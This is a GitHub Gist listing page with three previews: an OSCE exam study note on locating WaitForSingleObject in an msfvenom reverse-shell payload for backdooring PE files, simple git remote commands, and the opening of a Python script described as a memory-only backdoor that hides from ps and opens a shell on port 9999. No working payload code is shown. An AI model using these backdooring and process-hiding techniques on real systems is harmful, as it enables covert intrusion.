Skip to content

Instantly share code, notes, and snippets.

View kernel-sanders's full-sized avatar

Erik kernel-sanders

119 followers · 152 following
View GitHub Profile
@mgeeky
mgeeky / msfvenom-reverse-tcp-WaitForSingleObject.md
Last active January 16, 2025 19:33
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

@DianaEromosele
DianaEromosele / Change "origin" of your GIT repository
Created August 7, 2016 00:31
Change "origin" of your GIT repository
$ git remote rm origin
$ git remote add origin [email protected]:aplikacjainfo/proj1.git
$ git config master.remote origin
$ git config master.merge refs/heads/master
@epinna
epinna / pypest.py
Last active September 4, 2023 02:13
Hackish one-liner memory-only backdoor agent which hides from ps
#!/usr/bin/env python
# This script prints a simple one-liner memory-only backdoor agent which hides from ps.
# It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite
# and spawns a shell on port 9999. Just an experiment, there are simplest way to run unnoticed in the
# process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre)
template = """
import sys,re,pty,os,socket